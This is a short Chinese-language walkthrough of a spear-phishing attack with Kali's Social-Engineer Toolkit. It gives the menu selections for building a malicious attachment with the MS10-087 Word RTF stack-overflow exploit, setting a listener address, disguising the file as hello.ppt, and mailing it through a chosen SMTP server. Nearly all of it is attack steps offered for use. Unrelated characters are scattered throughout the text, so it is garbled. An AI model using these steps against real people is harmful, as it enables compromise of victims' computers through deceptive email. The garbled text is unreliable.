0x00 魚叉式釣魚攻擊
攻擊者通過發(fā)送帶有攻擊性的郵件給受害者,一旦受害者打開攻擊郵件坑鱼,點(diǎn)開攻擊郵件中的附件等枷遂,就會給受害者的電腦造成一定的影響。
0x01 釣魚攻擊步驟
【Step1】
root@kali:~# setoolkit
啟動SET終端
kali linux啟動SET終端创译,出現(xiàn)下圖。
【Step2】
set>1
選擇1墙基,社會工程學(xué)攻擊
【Step3】
set>1
選擇1软族,魚叉式釣魚攻擊
從上圖中可以看出,魚叉式釣魚攻擊有3種:
- 群發(fā)郵件残制;
- 創(chuàng)建1個(gè)文件的附件立砸;
- 創(chuàng)建1個(gè)社會工程學(xué)模板。
【Step4】
set:phishing>2
選擇2初茶,即創(chuàng)建1個(gè)文件的附件
上圖中有20多種通過附件形式進(jìn)行攻擊的方式颗祝,利用操作系統(tǒng)和軟件的漏洞進(jìn)行攻擊,也就是說在特定的版本或系統(tǒng)上才出現(xiàn),因此要注意被測試的系統(tǒng)和軟件版本螺戳。
【Step5】
set:payload>6
選擇6搁宾, 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)。payload選擇為MS10-087
【Step6】
set:payload>4
選擇4倔幼,并輸入本地監(jiān)聽地址10.121.10.170
【Step7】
set:phishing>2
選擇2盖腿,重命名文件為hello.ppt
【Step8】
set:phishing>1
選擇“1”,發(fā)送單份郵件
然后
set:phishing>2
選擇“2”损同,使用郵件發(fā)送模板
先輸入email郵件主題奸忽,然后選擇是以頁面形式發(fā)送還是文本形式發(fā)送,此處選擇p揖庄,即文本形式發(fā)送栗菜。然后輸入一些郵件內(nèi)容,輸入完畢后按“Ctrl+C”蹄梢。最后輸入發(fā)送郵件的郵箱地址疙筹。如下圖所示。
【Step9】
set:phishing>2
選擇“2”禁炒,use your own server or open relay而咆,使用自定義郵箱服務(wù)器
輸入發(fā)送郵件的郵箱地址:nijunwei@dp.com
輸入發(fā)送郵件的郵箱可見名:nijunwei
輸入發(fā)送郵件的郵箱名:nijunwei@dp.com
輸入發(fā)送郵件的郵箱密碼:-------
輸入發(fā)送郵箱的SMTP服務(wù)器地址:192.168.2.254
輸入SMTP服務(wù)器的端口:25
是否設(shè)定郵件為高優(yōu)先級:yes
是否設(shè)置監(jiān)聽:yes